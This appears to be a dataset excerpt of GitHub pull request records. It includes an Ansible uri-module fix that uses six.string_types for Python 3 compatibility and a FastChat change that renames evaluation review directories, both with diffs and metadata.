- [x] passes `git diff upstream/master -u -- "*.py" | flake8 --diff`
- [ ] whatsnew entry
| https://api.github.com/repos/pandas-dev/pandas/pulls/38854 | 2020-12-31T15:58:31Z | 2020-12-31T18:48:28Z | 2020-12-31T18:48:28Z | 2021-01-01T12:14:28Z | 146 | pandas-dev/pandas | 44,801 |
Updates uri to use six for isinstance comparison for py3 compatibility | diff --git a/lib/ansible/modules/network/basics/uri.py b/lib/ansible/modules/network/basics/uri.py
index 882f3fd5d83928..84da897805de12 100644
--- a/lib/ansible/modules/network/basics/uri.py
+++ b/lib/ansible/modules/network/basics/uri.py
@@ -401,7 +401,7 @@ def main():
if body_format == 'json':
# Encode the body unless its a string, then assume it is pre-formatted JSON
- if not isinstance(body, basestring):
+ if not isinstance(body, six.string_types):
body = json.dumps(body)
lower_header_keys = [key.lower() for key in dict_headers]
if 'content-type' not in lower_header_keys:
| ##### ISSUE TYPE
Bugfix Pull Request
##### COMPONENT NAME
uri
##### ANSIBLE VERSION
```
v2.3
```
##### SUMMARY
Updates uri to use six for isinstance comparison for py3 compatibility | https://api.github.com/repos/ansible/ansible/pulls/20239 | 2017-01-13T19:09:02Z | 2017-01-13T19:16:21Z | 2017-01-13T19:16:21Z | 2019-04-26T20:11:04Z | 170 | ansible/ansible | 49,106 |
fix dirname | diff --git a/fastchat/eval/table/review/vicuna-13b:20230322-clean-lang/review_alpaca-13b_vicuna-13b.jsonl b/fastchat/eval/table/review/vicuna-13b_20230322-clean-lang/review_alpaca-13b_vicuna-13b.jsonl
similarity index 100%
rename from fastchat/eval/table/review/vicuna-13b:20230322-clean-lang/review_alpaca-13b_vicuna-13b.jsonl
rename to fastchat/eval/table/review/vicuna-13b_20230322-clean-lang/review_alpaca-13b_vicuna-13b.jsonl
diff --git a/fastchat/eval/table/review/vicuna-13b:20230322-clean-lang/review_bard_vicuna-13b.jsonl b/fastchat/eval/table/review/vicuna-13b_20230322-clean-lang/review_bard_vicuna-13b.jsonl
similarity index 100%
rename from fastchat/eval/table/review/vicuna-13b:20230322-clean-lang/review_bard_vicuna-13b.jsonl
rename to fastchat/eval/table/review/vicuna-13b_20230322-clean-lang/review_bard_vicuna-13b.jsonl
diff --git a/fastchat/eval/table/review/vicuna-13b:20230322-clean-lang/review_gpt35_vicuna-13b.jsonl b/fastchat/eval/table/review/vicuna-13b_20230322-clean-lang/review_gpt35_vicuna-13b.jsonl
similarity index 100%
rename from fastchat/eval/table/review/vicuna-13b:20230322-clean-lang/review_gpt35_vicuna-13b.jsonl
rename to fastchat/eval/table/review/vicuna-13b_20230322-clean-lang/review_gpt35_vicuna-13b.jsonl
diff --git a/fastchat/eval/table/review/vicuna-13b:20230322-clean-lang/review_llama-13b_vicuna-13b.jsonl b/fastchat/eval/table/review/vicuna-13b_20230322-clean-lang/review_llama-13b_vicuna-13b.jsonl
similarity index 100%
rename from fastchat/eval/table/review/vicuna-13b:20230322-clean-lang/review_llama-13b_vicuna-13b.jsonl
rename to fastchat/eval/table/review/vicuna-13b_20230322-clean-lang/review_llama-13b_vicuna-13b.jsonl
diff --git a/fastchat/eval/table/review/vicuna-13b:20230322-new-hp-fp16.jsonl/review_alpaca-13b_vicuna-13b:20230322-new-hp-fp16.jsonl b/fastchat/eval/table/review/vicuna-13b_20230322-new-hp-fp16/review_alpaca-13b_vicuna-13b:20230322-new-hp-fp16.jsonl
similarity index 100%
rename from fastchat/eval/table/review/vicuna-13b:20230322-new-hp-fp16.jsonl/review_alpaca-13b_vicuna-13b:20230322-new-hp-fp16.jsonl
rename to fastchat/eval/table/review/vicuna-13b_20230322-new-hp-fp16/review_alpaca-13b_vicuna-13b:20230322-new-hp-fp16.jsonl
diff --git a/fastchat/eval/table/review/vicuna-13b:20230322-new-hp-fp16.jsonl/review_bard_vicuna-13b:20230322-new-hp-fp16.jsonl b/fastchat/eval/table/review/vicuna-13b_20230322-new-hp-fp16/review_bard_vicuna-13b:20230322-new-hp-fp16.jsonl
similarity index 100%
rename from fastchat/eval/table/review/vicuna-13b:20230322-new-hp-fp16.jsonl/review_bard_vicuna-13b:20230322-new-hp-fp16.jsonl
rename to fastchat/eval/table/review/vicuna-13b_20230322-new-hp-fp16/review_bard_vicuna-13b:20230322-new-hp-fp16.jsonl
diff --git a/fastchat/eval/table/review/vicuna-13b:20230322-new-hp-fp16.jsonl/review_gpt35_vicuna-13b:20230322-new-hp-fp16.jsonl b/fastchat/eval/table/review/vicuna-13b_20230322-new-hp-fp16/review_gpt35_vicuna-13b:20230322-new-hp-fp16.jsonl
similarity index 100%
rename from fastchat/eval/table/review/vicuna-13b:20230322-new-hp-fp16.jsonl/review_gpt35_vicuna-13b:20230322-new-hp-fp16.jsonl
rename to fastchat/eval/table/review/vicuna-13b_20230322-new-hp-fp16/review_gpt35_vicuna-13b:20230322-new-hp-fp16.jsonl
diff --git a/fastchat/eval/table/review/vicuna-13b:20230322-new-hp-fp16.jsonl/review_llama_vicuna-13b:20230322-new-hp-fp16.jsonl b/fastchat/eval/table/review/vicuna-13b_20230322-new-hp-fp16/review_llama_vicuna-13b:20230322-new-hp-fp16.jsonl
similarity index 100%
rename from fastchat/eval/table/review/vicuna-13b:20230322-new-hp-fp16.jsonl/review_llama_vicuna-13b:20230322-new-hp-fp16.jsonl
rename to fastchat/eval/table/review/vicuna-13b_20230322-new-hp-fp16/review_llama_vicuna-13b:20230322-new-hp-fp16.jsonl
diff --git a/fastchat/eval/table/review/vicuna-7b:20230322-fp16/review_alpaca-13b_vicuna-7b.jsonl b/fastchat/eval/table/review/vicuna-7b_20230322-fp16/review_alpaca-13b_vicuna-7b.jsonl
similarity index 100%
rename from fastchat/eval/table/review/vicuna-7b:20230322-fp16/review_alpaca-13b_vicuna-7b.jsonl
rename to fastchat/eval/table/review/vicuna-7b_20230322-fp16/review_alpaca-13b_vicuna-7b.jsonl
diff --git a/fastchat/eval/table/review/vicuna-7b:20230322-fp16/review_bard_vicuna-7b.jsonl b/fastchat/eval/table/review/vicuna-7b_20230322-fp16/review_bard_vicuna-7b.jsonl
similarity index 100%
rename from fastchat/eval/table/review/vicuna-7b:20230322-fp16/review_bard_vicuna-7b.jsonl
rename to fastchat/eval/table/review/vicuna-7b_20230322-fp16/review_bard_vicuna-7b.jsonl
diff --git a/fastchat/eval/table/review/vicuna-7b:20230322-fp16/review_gpt35_vicuna-7b.jsonl b/fastchat/eval/table/review/vicuna-7b_20230322-fp16/review_gpt35_vicuna-7b.jsonl
similarity index 100%
rename from fastchat/eval/table/review/vicuna-7b:20230322-fp16/review_gpt35_vicuna-7b.jsonl
rename to fastchat/eval/table/review/vicuna-7b_20230322-fp16/review_gpt35_vicuna-7b.jsonl
diff --git a/fastchat/eval/table/review/vicuna-7b:20230322-fp16/review_llama_vicuna-7b.jsonl b/fastchat/eval/table/review/vicuna-7b_20230322-fp16/review_llama_vicuna-7b.jsonl
similarity index 100%
rename from fastchat/eval/table/review/vicuna-7b:20230322-fp16/review_llama_vicuna-7b.jsonl
rename to fastchat/eval/table/review/vicuna-7b_20230322-fp16/review_llama_vicuna-7b.jsonl
| Fix https://github.com/lm-sys/FastChat/issues/241. | https://api.github.com/repos/lm-sys/FastChat/pulls/260 | 2023-04-07T00:26:20Z | 2023-04-07T00:29:14Z | 2023-04-07T00:29:14Z | 2023-04-07T00:29:17Z | 2,033 | lm-sys/FastChat | 41,733 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.